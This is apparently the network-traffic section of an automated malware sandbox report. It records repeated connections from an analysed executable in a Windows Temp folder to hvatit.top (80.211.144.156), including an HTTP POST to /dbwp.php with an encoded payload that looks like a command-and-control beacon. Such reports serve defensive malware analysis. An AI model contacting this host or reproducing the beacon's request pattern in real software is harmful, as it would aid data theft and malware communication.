                                                        Aug 31, 2024 09:35:45.271837950 CEST804999980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:45.271950006 CEST4999980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:45.272048950 CEST4999980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:45.276767015 CEST804999980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:45.630670071 CEST4999980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:45.635675907 CEST804999980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:45.635688066 CEST804999980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:45.635698080 CEST804999980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:45.935364962 CEST804999980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:46.021230936 CEST4999980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:46.128781080 CEST804999980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:46.253801107 CEST4999980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:46.254540920 CEST5000080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:46.258893013 CEST804999980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:46.258939981 CEST4999980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:46.259336948 CEST805000080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:46.259413958 CEST5000080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:46.259536982 CEST5000080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:46.264255047 CEST805000080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:46.615103006 CEST5000080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:46.619992018 CEST805000080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:46.620002985 CEST805000080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:46.620009899 CEST805000080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:46.943259954 CEST805000080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:47.024195910 CEST5000080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:47.075992107 CEST805000080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:47.130595922 CEST5000080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:47.210390091 CEST5000080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:47.210397005 CEST5000180192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:47.215296984 CEST805000180.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:47.215679884 CEST805000080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:47.218493938 CEST5000080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:47.218496084 CEST5000180192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:47.218611002 CEST5000180192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:47.223395109 CEST805000180.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:47.570389032 CEST5000180192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:47.575329065 CEST805000180.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:47.575345993 CEST805000180.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:47.575355053 CEST805000180.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:47.756685972 CEST5000180192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:47.756685972 CEST5000280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:47.761540890 CEST805000280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:47.761879921 CEST805000180.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:47.762505054 CEST5000180192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:47.762505054 CEST5000280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:47.762590885 CEST5000280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:47.767328978 CEST805000280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:47.878397942 CEST5000380192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:47.883284092 CEST805000380.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:47.883472919 CEST5000380192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:47.883562088 CEST5000380192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:47.888287067 CEST805000380.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:48.115447998 CEST5000280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:48.120301008 CEST805000280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:48.120527983 CEST805000280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:48.240159035 CEST5000380192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:48.245065928 CEST805000380.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:48.245076895 CEST805000380.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:48.245085001 CEST805000380.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:48.446913958 CEST805000280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:48.489964962 CEST5000280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:48.575959921 CEST805000380.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:48.579597950 CEST805000280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:48.630585909 CEST5000280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:48.630606890 CEST5000380192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:48.709482908 CEST805000380.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:48.833242893 CEST5000280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:48.833323002 CEST5000380192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:48.838155031 CEST5000480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:48.838830948 CEST805000280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:48.838891029 CEST5000280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:48.839107990 CEST805000380.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:48.839148045 CEST5000380192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:48.843031883 CEST805000480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:48.843103886 CEST5000480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:48.843190908 CEST5000480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:48.848032951 CEST805000480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:49.193434954 CEST5000480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:49.198371887 CEST805000480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:49.198384047 CEST805000480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:49.198391914 CEST805000480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:49.507147074 CEST805000480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:49.554421902 CEST5000480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:49.635711908 CEST805000480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:49.677486897 CEST5000480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:49.750386000 CEST5000480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:49.750623941 CEST5000580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:49.755475998 CEST805000480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:49.755487919 CEST805000580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:49.758435011 CEST5000580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:49.758445978 CEST5000480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:49.758544922 CEST5000580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:49.763273001 CEST805000580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:50.115088940 CEST5000580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:50.120004892 CEST805000580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:50.120016098 CEST805000580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:50.120026112 CEST805000580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:50.431492090 CEST805000580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:50.565582991 CEST805000580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:50.565639019 CEST5000580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:50.692397118 CEST5000680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:50.697251081 CEST805000680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:50.697319031 CEST5000680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:50.697408915 CEST5000680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:50.702189922 CEST805000680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:51.052798033 CEST5000680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:51.057765961 CEST805000680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:51.057777882 CEST805000680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:51.057785988 CEST805000680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:51.370095015 CEST805000680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:51.430394888 CEST5000680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:51.502041101 CEST805000680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:51.630686998 CEST5000680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:51.632930994 CEST5000680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:51.633816957 CEST5000780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:51.640856981 CEST805000680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:51.641319990 CEST5000680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:51.641361952 CEST805000780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:51.641470909 CEST5000780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:51.641552925 CEST5000780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:51.649123907 CEST805000780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:51.990398884 CEST5000780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:51.995361090 CEST805000780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:51.995373011 CEST805000780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:51.995381117 CEST805000780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:52.304117918 CEST805000780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:52.349347115 CEST5000780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:52.431096077 CEST805000780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:52.474354029 CEST5000780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:52.551002026 CEST5000780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:52.551697016 CEST5000880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:52.560297966 CEST805000880.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:52.560353994 CEST5000880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:52.560430050 CEST805000780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:52.560434103 CEST5000880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:52.560472012 CEST5000780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:52.567960024 CEST805000880.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:52.912168026 CEST5000880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:52.920588970 CEST805000880.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:52.920598984 CEST805000880.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:52.920605898 CEST805000880.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:53.243818045 CEST805000880.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:53.290394068 CEST5000880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:53.375524998 CEST805000880.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:53.430404902 CEST5000880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:53.500370979 CEST5000580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:53.500596046 CEST5000880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:53.501197100 CEST5000980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:53.505784988 CEST805000880.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:53.505878925 CEST5000880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:53.505995035 CEST805000980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:53.506154060 CEST5000980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:53.506309032 CEST5000980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:53.511080980 CEST805000980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:53.584095955 CEST5000980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:53.586393118 CEST5001080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:53.591156006 CEST805001080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:53.594504118 CEST5001080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:53.594504118 CEST5001080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:53.599271059 CEST805001080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:53.628977060 CEST805000980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:53.706434011 CEST5001180192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:53.711241007 CEST805001180.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:53.714555979 CEST5001180192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:53.714648962 CEST5001180192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:53.719397068 CEST805001180.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:53.946407080 CEST5001080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:53.952377081 CEST805001080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:53.952593088 CEST805001080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:53.970885038 CEST805000980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:53.974463940 CEST5000980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:54.070400953 CEST5001180192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:54.075237989 CEST805001180.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:54.075249910 CEST805001180.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:54.075258017 CEST805001180.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:54.266984940 CEST805001080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:54.318105936 CEST5001080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:54.381896019 CEST805001180.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:54.427479029 CEST5001180192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:54.466839075 CEST805001080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:54.512717962 CEST805001180.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:54.521234035 CEST5001080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:54.568110943 CEST5001180192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:54.630057096 CEST5001080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:54.630203009 CEST5001180192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:54.631154060 CEST5001280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:54.635229111 CEST805001080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:54.635277987 CEST5001080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:54.635857105 CEST805001180.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:54.635895014 CEST5001180192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:54.635900974 CEST805001280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:54.635962009 CEST5001280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:54.636059046 CEST5001280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:54.640820026 CEST805001280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:54.990103960 CEST5001280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:54.994955063 CEST805001280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:54.994966984 CEST805001280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:54.994973898 CEST805001280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:55.309489965 CEST805001280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:55.366394043 CEST5001280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:55.439604998 CEST805001280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:55.442590952 CEST5001280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:55.447813034 CEST805001280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:55.448098898 CEST5001280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:55.562809944 CEST5001380192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:55.567610979 CEST805001380.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:55.570471048 CEST5001380192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:55.570725918 CEST5001380192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:55.575512886 CEST805001380.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:55.927701950 CEST5001380192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:55.932682991 CEST805001380.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:55.932694912 CEST805001380.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:55.932703972 CEST805001380.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:56.278484106 CEST805001380.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:56.333731890 CEST5001380192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:56.407847881 CEST805001380.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:56.458729982 CEST5001380192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:56.536643028 CEST5001380192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:56.537719965 CEST5001480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:56.542624950 CEST805001480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:56.542689085 CEST5001480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:56.542772055 CEST5001480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:56.543039083 CEST805001380.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:56.543083906 CEST5001380192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:56.547544956 CEST805001480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:56.896294117 CEST5001480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:56.901292086 CEST805001480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:56.901302099 CEST805001480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:56.901309967 CEST805001480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:57.237097979 CEST805001480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:57.286915064 CEST5001480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:57.367600918 CEST805001480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:57.414402962 CEST5001480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:57.490403891 CEST5001580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:57.490423918 CEST5001480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:57.495321989 CEST805001580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:57.495592117 CEST805001480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:57.502402067 CEST5001580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:57.502420902 CEST5001480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:57.507504940 CEST5001580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:57.512497902 CEST805001580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:58.029031038 CEST5001580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:58.034006119 CEST805001580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:58.034023046 CEST805001580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:58.034030914 CEST805001580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:58.174880981 CEST805001580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:58.224375010 CEST5001580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:58.317950010 CEST805001580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:58.365222931 CEST5001580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:58.448291063 CEST5001580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:58.449562073 CEST5001680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:58.453540087 CEST805001580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:58.453587055 CEST5001580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:58.454314947 CEST805001680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:58.454369068 CEST5001680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:58.454546928 CEST5001680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:58.459256887 CEST805001680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:58.803061008 CEST5001680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:58.807940006 CEST805001680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:58.807954073 CEST805001680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:58.807961941 CEST805001680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:59.146014929 CEST805001680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:59.224368095 CEST5001680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:59.285603046 CEST805001680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:59.407687902 CEST5001680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:59.408137083 CEST5001780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:59.412834883 CEST805001680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:59.412903070 CEST805001780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:59.412923098 CEST5001680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:59.412970066 CEST5001780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:59.413048983 CEST5001780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:59.417764902 CEST805001780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:59.475380898 CEST5001780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:59.475713968 CEST5001880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:59.480539083 CEST805001880.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:59.480601072 CEST5001880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:59.480706930 CEST5001880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:59.485506058 CEST805001880.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:59.525064945 CEST805001780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:59.596746922 CEST5001980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:59.601670980 CEST805001980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:59.601747036 CEST5001980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:59.601902008 CEST5001980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:59.606666088 CEST805001980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:59.833827019 CEST5001880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:59.838880062 CEST805001880.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:59.838891983 CEST805001880.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:59.894655943 CEST805001780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:59.894710064 CEST5001780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:59.958833933 CEST5001980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:59.963711977 CEST805001980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:59.963721037 CEST805001980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:59.963728905 CEST805001980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:36:00.146521091 CEST805001880.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:36:00.250956059 CEST5001880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:36:00.275032997 CEST805001980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:36:00.318116903 CEST5001980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:36:00.352356911 CEST805001880.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:36:00.469289064 CEST805001980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:36:00.490004063 CEST5001880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:36:00.606230974 CEST5001880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:36:00.606363058 CEST5001980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:36:00.607461929 CEST5002080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:36:00.611323118 CEST805001880.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:36:00.611372948 CEST5001880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:36:00.611707926 CEST805001980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:36:00.611753941 CEST5001980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:36:00.612176895 CEST805002080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:36:00.612234116 CEST5002080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:36:00.612350941 CEST5002080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:36:00.617070913 CEST805002080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:36:01.307749987 CEST805002080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:36:01.490355015 CEST5002080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:36:02.049935102 CEST5002080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:36:02.054832935 CEST805002080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:36:02.054843903 CEST805002080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:36:02.054852009 CEST805002080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:36:02.349638939 CEST805002080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:36:02.411875010 CEST5002080192.168.2.480.211.144.156

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Aug 31, 2024 09:32:11.831358910 CEST6224153192.168.2.41.1.1.1
                                                        Aug 31, 2024 09:32:12.563159943 CEST53622411.1.1.1192.168.2.4

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Aug 31, 2024 09:32:11.831358910 CEST192.168.2.41.1.1.10x5353Standard query (0)hvatit.topA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Aug 31, 2024 09:32:12.563159943 CEST1.1.1.1192.168.2.40x5353No error (0)hvatit.top80.211.144.156A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • hvatit.top

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.44973280.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:12.576457977 CEST241OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 344
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:12.927773952 CEST344OUTData Raw: 00 04 04 0c 03 0f 04 01 05 06 02 01 02 07 01 0a 00 05 05 00 02 0d 03 01 01 00 0f 57 05 04 02 03 0a 03 06 0a 03 07 05 00 0f 02 05 56 00 01 05 00 06 01 0b 00 0d 00 01 00 01 02 03 04 05 07 05 08 03 02 0e 0a 06 56 06 52 0e 07 0c 50 0e 00 0b 02 07 56
